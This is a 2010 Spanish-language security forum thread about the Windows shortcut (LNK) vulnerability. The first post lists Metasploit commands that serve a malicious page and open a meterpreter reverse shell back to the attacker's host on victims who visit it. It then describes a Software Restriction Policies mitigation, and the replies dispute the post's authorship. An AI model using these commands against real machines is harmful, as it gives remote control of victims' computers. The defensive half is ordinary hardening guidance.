• General

  • Esta sección englobará diversas técnicas y campos de la seguridad informática moderna.
Esta sección englobará diversas técnicas y campos de la seguridad informática moderna.
 #210202  por Invitado
 26 Jul 2010, 02:12
Hola amigos, hace poco se publico un fallo, para todas las versiones actuales de Microsoft Windows.
Por un lado les presentare la solucion mediante las Directivas de Restriccion de Software, y por el otro el Poc de Metasploit para ejecutarlo.

Para los que no esten al tanto les paso un Advisory sobre el tema.
http://www.microsoft.com/technet/securi ... 86198.mspx

Por un lado ya existe el Poc de Metasploit, les recomiendo antes que nada actualizar el framework
con el comando "svn update"
Código: Seleccionar todo
use windows/browser/ms10_xxx_windows_shell_lnk_execute
set SRVHOST 192.168.162.136
set SRVPORT 80
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.162.136
set LPORT 443
exploit
Tengo entendido ami parecer que de esta forma levantamos el servidor web apuntanto al puerto 80, cuando nuestra victima lo visite nos permite el acceso mediante el shell del meterpreter al puerto 443

[Gracias a Leo Pigñer por la entrada en su blog, y las buenas recomendaciones sobre MSF, y claro esta por la onda ]


Ahora en nuestro equipo como evitar este ataque de forma muy casera hasta que MS saque su parche? que seguramente no compartira el siglo que companter el resto de los parches.



Para aplicar la directiva hay que acceder desde el panel de control, herramientas administrativas: Directiva de seguridad Local.
Imagen

La primera vez que se accede a las Directivas de restricción de software, es necesario crearlas pulsando sobre el botón derecho en esa carpeta.
Imagen


Posteriormente se añadirá la ruta de los discos duros donde se encuentren ficheros de sistema y que serán excluidos de la directiva. Añadiendo una nueva ruta dentro de las "Reglas adicionales", en el ejemplo el disco es C:

Imagen


Imagen


Para evitar la vulnerabilidad, además de los archivos ejecutables EXE, también hay que añadir las librerías DLL. En las propiedades de "Obligatoriedad", seleccionando "Todos los archivos de software"

Imagen


Por último, se modificará el funcionamiento de listas negras a listas blancas. Dentro de Niveles de Seguridad, en las propiedades de "No permitido": Establecer como predeterminado.

Imagen

Segun la gente de Security By Default esto es aplicable a una GPO en una red lan para aplicar como nueva politica via red.

Sin mas, este es mi primer post en la comuniddad, les envio un abrazo dede Argentina !!
 #210526  por DSR!
 26 Jul 2010, 17:49
el texto es de Leo?
 #210529  por Skillmax
 26 Jul 2010, 17:52
DSR!/Shimpei escribió:el texto es de Leo?

No, es de KikArg, este post ya esta publicado, cierren el tema, amigos.
 #210963  por DSR!
 27 Jul 2010, 18:24
en primer lugar los temas me parece que se cierran cuando un mod o admin lo dicen no?
en segundo la 1 parte del post como dice el amigo Lcno esta escripo por nuestro queridisimo Leonardo Pigner (http://www.kungfoosion.com/2010/07/expl ... ploit.html)
y por ultimo la 2 parte del post supongo debe ser de los muchachos de Security By Default.
me gusta saber las funtes reales de la informacion no las fuentes "taringa" que son un copy & paste de un copy & paste y en el medio un par de servidores de bifrost para no perder la costumbre